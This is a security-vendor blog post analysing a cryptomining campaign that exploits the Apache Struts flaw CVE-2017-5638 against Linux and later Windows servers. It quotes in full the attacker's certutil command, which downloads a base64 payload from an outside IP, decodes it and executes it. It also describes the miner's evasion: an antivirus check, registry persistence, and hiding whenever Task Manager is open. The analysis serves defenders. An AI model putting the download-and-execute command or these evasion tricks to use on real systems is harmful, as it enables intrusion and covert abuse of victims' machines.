Since July of 2017, F5 researchers have been monitoring a campaign exploiting the Apache Struts 2 Jakarta Multipart Parser remote code execution (RCE) vulnerability (CVE-2017-5638). This campaign began by infecting Struts systems running on the Linux operating system to mine Electroneum crypto-currency. It’s often the case that, as the time passed, the attackers decide to expand their mining operations to new targets.
In Figure 1, an example of the original attack request shows that the attackers were initially injecting Linux shell payload that was using the built-in Linux “wget” and “curl” tools to download the miner malware and add it as a “cron” job for persistence.
In mid-March, 2018, F5 researchers observed a shift in the existing campaign wherein the injected payload changed to target Windows-based Struts servers.
As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://22.214.171.124/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.
Once the file is downloaded and base64-decoded using certutil, it is saved as update.exe and executed.
As shown in Figure 4, the metadata for the file indicates that the executable file most likely was created on January 30, 2018.
The file itself is a Windows installer that was created using a legitimate NSIS (Nullsoft Scriptable Install System) tool.
“NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers. It is designed to be as small and flexible as possible and is therefore very suitable for internet distribution.”
While most malwares implement their own downloader to evade detection, the current attacker is not even trying to hide and is using a more obvious way to install it, which requires just scripting knowledge.
The installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax.
The installer contains three DLL files that are part of the NSIS system and enable it to execute certain commands.
Once the installer is executed, it sleeps for 16 seconds and checks for the presence of ESET antivirus on the vulnerable machine. There is no obvious explanation why the attacker chooses to check specifically for ESET antivirus.
If the ESET antivirus presents, the installer will use nsisdl.dll to download a file called nod.lock and stop the installation process. Unfortunately, we were not able to get the file during the analysis of this campaign. Strangely, this file is not being executed or mentioned further in the code.
If ESET antivirus is not present on the vulnerable machine, the installer checks the operation system architecture using system.dll plug-in and downloads “msi32.zip” or “msi64.zip” accordingly.
The file is downloaded to the %appdata%/MSSearchIndexer folder and unzipped using the ZipDLL.dll module, which contains only a few files. The extracted zip file is then removed from the target system.
The installer then executes the malicious SerachIndexer.exe file, which in turn starts the mssearch.exe file. The reason behind this execution concatenation will be soon explained.
For persistence, the installer adds a registry entry to run this file on startup.
The extracted mssearch.exe file is a fork of cpuminer project called CPUMiner-Multi. The main difference between the two miners is that the CPUMiner multi-supports more algorithms than the original one. In this case, the miner is configured to mine Electroneum (ETN) cryptocurrency.
Looking at the search.cf miner configuration file, we can see the mining pool address with the wallet public address.
The pool server itself is located in Germany, as shown in Figure 14.
To date, the Windows operation seems not to be extremely profitable as the mined amount for a few days is only about $20.00. Not quite the large payouts we’ve seen from other cryptomining campaigns.
As mentioned before, the MSSearchIndexer.exe executable file is starting the mssearch.exe miner, while it is also responsible for hiding the mining operation.
Because an infected user might try to check why their machine is so slow by opening the Windows Task Manager to view the CPU and memory performance, the process contantly checks to see whether Windows Task Manager is being opened on the target system. If it is, the mssearch.exe process will be killed or won’t start if it is already open. This can be seen in figures 17 – 20.
Once the task manager is closed, MssearchIndexer.exe will start the mining process again.
Crypto-mining campaigns are very popular nowadays, and the Monero (XMR) currency is the common choice for cybercrime. This campaign is an interesting example of attackers shifting operations to mine another currency. Both Monero and Electroneum use the CryptoNight algorithm, which is just as suitable to mine on a CPU as it is on a GPU. This explains why the attackers chose to mine on compromised web servers. Because Electroneum and Monero are not the only cryptocurrency that provide this behavior, we can expect to see attackers extend their campaigns to other cryptocurrencies, as well, in the future.
To prevent this attack on your applications, simply patch the Apache Struts 2 Jakarta Multipart Parser remote code execution CVE-2017-5638 and (or) implement a web application firewall to block the attack.